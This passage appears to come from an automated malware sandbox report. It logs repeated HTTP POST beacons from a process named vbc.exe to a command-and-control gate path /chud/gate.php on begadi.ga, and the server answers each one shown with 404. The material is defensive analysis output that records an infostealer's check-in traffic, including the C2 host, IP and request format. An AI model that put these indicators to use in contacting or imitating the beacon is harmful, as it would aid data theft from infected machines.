                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 176
                Connection: close
                Dec 21, 2020 08:33:32.529612064 CET617INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:32 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 15
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.2249177185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:36.908483028 CET628OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:37.104372025 CET629INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:36 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                100192.168.2.2249267185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                101192.168.2.2249268185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                102192.168.2.2249269185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                103192.168.2.2249270185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                104192.168.2.2249271185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                105192.168.2.2249272185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                106192.168.2.2249273185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                107192.168.2.2249274185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                108192.168.2.2249275185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                109192.168.2.2249276185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.2249178185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:37.413851023 CET630OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:37.608020067 CET630INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:37 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                110192.168.2.2249277185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                111192.168.2.2249278185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                112192.168.2.2249279185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                113192.168.2.2249280185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                114192.168.2.2249281185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                115192.168.2.2249282185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                116192.168.2.2249283185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                117192.168.2.2249284185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                118192.168.2.2249285185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                119192.168.2.2249286185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.2249179185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:37.896116018 CET631OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:38.091372013 CET632INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:37 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                120192.168.2.2249287185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                121192.168.2.2249288185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                122192.168.2.2249289185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                123192.168.2.2249290185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                124192.168.2.2249291185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                125192.168.2.2249292185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                126192.168.2.2249293185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                127192.168.2.2249294185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                128192.168.2.2249295185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                129192.168.2.2249296185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.2249180185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:38.365580082 CET632OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:38.546295881 CET633INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:38 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                130192.168.2.2249297185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                131192.168.2.2249298185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                132192.168.2.2249299185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                133192.168.2.2249300185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                134192.168.2.2249301185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                135192.168.2.2249302185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                136192.168.2.2249303185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                137192.168.2.2249304185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                138192.168.2.2249305185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                139192.168.2.2249306185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.2249181185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:38.845704079 CET634OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:39.040893078 CET634INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:38 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                140192.168.2.2249307185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                141192.168.2.2249308185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                142192.168.2.2249309185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                143192.168.2.2249310185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                144192.168.2.2249311185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                145192.168.2.2249312185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                146192.168.2.2249313185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                147192.168.2.2249314185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                148192.168.2.2249315185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                149192.168.2.2249316185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.2249182185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:39.320761919 CET635OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:39.513073921 CET636INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:39 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                150192.168.2.2249317185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                151192.168.2.2249318185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                152192.168.2.2249319185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                153192.168.2.2249320185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                154192.168.2.2249321185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                155192.168.2.2249322185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                156192.168.2.2249323185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                157192.168.2.2249324185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                158192.168.2.2249325185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                159192.168.2.2249326185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.2249183185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:39.813663960 CET637OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:40.004152060 CET637INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:39 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                160192.168.2.2249327185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                161192.168.2.2249328185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                162192.168.2.2249329185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                163192.168.2.2249330185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                164192.168.2.2249331185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                165192.168.2.2249332185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                166192.168.2.2249333185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                167192.168.2.2249334185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                168192.168.2.2249335185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                169192.168.2.2249336185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.2249184185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:40.294286013 CET638OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:40.472325087 CET638INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:40 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                170192.168.2.2249337185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                171192.168.2.2249338185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                172192.168.2.2249339185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                173192.168.2.2249340185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                174192.168.2.2249341185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                175192.168.2.2249342185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                176192.168.2.2249343185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                177192.168.2.2249344185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.2249185185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:40.742275953 CET639OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:40.927834988 CET640INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:40 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.2249186185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:41.221610069 CET641OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:41.413666010 CET641INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:41 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249169185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:33.097276926 CET617OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 176
                Connection: close
                Dec 21, 2020 08:33:33.289712906 CET618INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:32 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 15
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.2249187185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:41.708348036 CET642OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:41.895755053 CET643INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:41 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.2249188185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:42.188874006 CET643OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:42.381172895 CET644INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:42 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.2249189185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:42.666408062 CET645OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:42.848618984 CET645INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:42 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.2249190185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:43.123722076 CET646OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:43.317317009 CET647INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:42 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.2249191185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:43.611074924 CET648OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:43.801179886 CET648INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:43 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.2249192185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:44.096730947 CET649OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:44.293749094 CET649INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:43 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.2249193185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:44.571158886 CET650OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:44.761157990 CET651INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:44 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.2249194185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:45.056071043 CET652OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:45.256386995 CET652INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:44 GMT
                Content-Type: text/html; charset=UTF-8
